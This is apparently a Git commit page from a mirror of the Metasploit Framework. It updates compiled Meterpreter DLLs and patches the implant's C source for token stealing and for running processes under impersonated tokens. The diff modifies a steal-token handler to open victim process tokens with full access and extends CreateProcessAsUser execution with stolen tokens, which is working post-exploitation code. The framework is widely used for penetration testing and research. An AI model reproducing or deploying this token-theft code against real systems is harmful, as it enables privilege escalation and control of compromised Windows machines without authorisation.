infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up some of the token impersonation code around process execution 

git-svn-id: file:///home/svn/framework3/trunk@9751 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-07-09 18:54:20 +00:00
parent 42f8dc10c0
commit 972e7bc282
18 changed files with 30 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/meterpreter/elevator.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_railgun.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

2
external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c vendored
View File

@ -219,7 +219,7 @@ DWORD request_sys_config_steal_token(Remote *remote, Packet *packet)
break;
}
if(! OpenProcessToken(handle, TOKEN_QUERY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE, &token)){
if(! OpenProcessToken(handle, TOKEN_ALL_ACCESS, &token)){
res = GetLastError();
dprintf("[STEAL-TOKEN] Failed to open process token for %d (%u)", pid, res);
break;

33
external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c vendored
View File

@ -3,6 +3,10 @@
#include "./../session.h"
#include "in-mem-exe.h" /* include skapetastic in-mem exe exec */
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNCREATEENVIRONMENTBLOCK)( LPVOID *lpEnvironment, HANDLE hToken, BOOL bInherit );
typedef BOOL (STDMETHODCALLTYPE FAR * LPFNDESTROYENVIRONMENTBLOCK) ( LPVOID lpEnvironment );
/*
* Attaches to the supplied process identifier. If no process identifier is
* supplied, the handle for the current process is returned to the requestor.
@ -95,6 +99,10 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
HANDLE token, pToken;
char * cpDesktop = NULL;
DWORD session = 0;
LPVOID pEnvironment = NULL;
LPFNCREATEENVIRONMENTBLOCK lpfnCreateEnvironmentBlock = NULL;
LPFNDESTROYENVIRONMENTBLOCK lpfnDestroyEnvironmentBlock = NULL;
HMODULE hUserEnvLib = NULL;
dprintf( "[PROCESS] request_sys_process_execute" );
@ -246,10 +254,13 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
if (flags & PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN)
{
// If there is a thread token use that, otherwise use current process token
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
// If there is an impersonated token stored, use that one first, otherwise
// try to grab the current thread token, then the process token
if (remote->hThreadToken)
token = remote->hThreadToken;
else if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &token))
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token);
// Duplicate to make primary token (try delegation first)
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &pToken))
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &pToken))
@ -258,12 +269,26 @@ DWORD request_sys_process_execute(Remote *remote, Packet *packet)
break;
}
hUserEnvLib = LoadLibrary("userenv.dll");
if ( NULL != hUserEnvLib ) {
lpfnCreateEnvironmentBlock = (LPFNCREATEENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "CreateEnvironmentBlock" );
lpfnDestroyEnvironmentBlock = (LPFNDESTROYENVIRONMENTBLOCK) GetProcAddress( hUserEnvLib, "DestroyEnvironmentBlock" );
if (lpfnCreateEnvironmentBlock && lpfnCreateEnvironmentBlock( &pEnvironment, pToken, FALSE)) {
createFlags |= CREATE_UNICODE_ENVIRONMENT;
} else {
pEnvironment = NULL;
}
}
// Try to execute the process with duplicated token
if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, NULL, NULL, &si, &pi))
if (!CreateProcessAsUser(pToken, NULL, commandLine, NULL, NULL, inherit, createFlags, pEnvironment, NULL, &si, &pi))
{
result = GetLastError();
break;
}
if (lpfnDestroyEnvironmentBlock && (NULL != pEnvironment)) lpfnDestroyEnvironmentBlock(&pEnvironment);
if ( NULL != hUserEnvLib ) FreeLibrary( hUserEnvLib );
}
else if( flags & PROCESS_EXECUTE_FLAG_SESSION )
{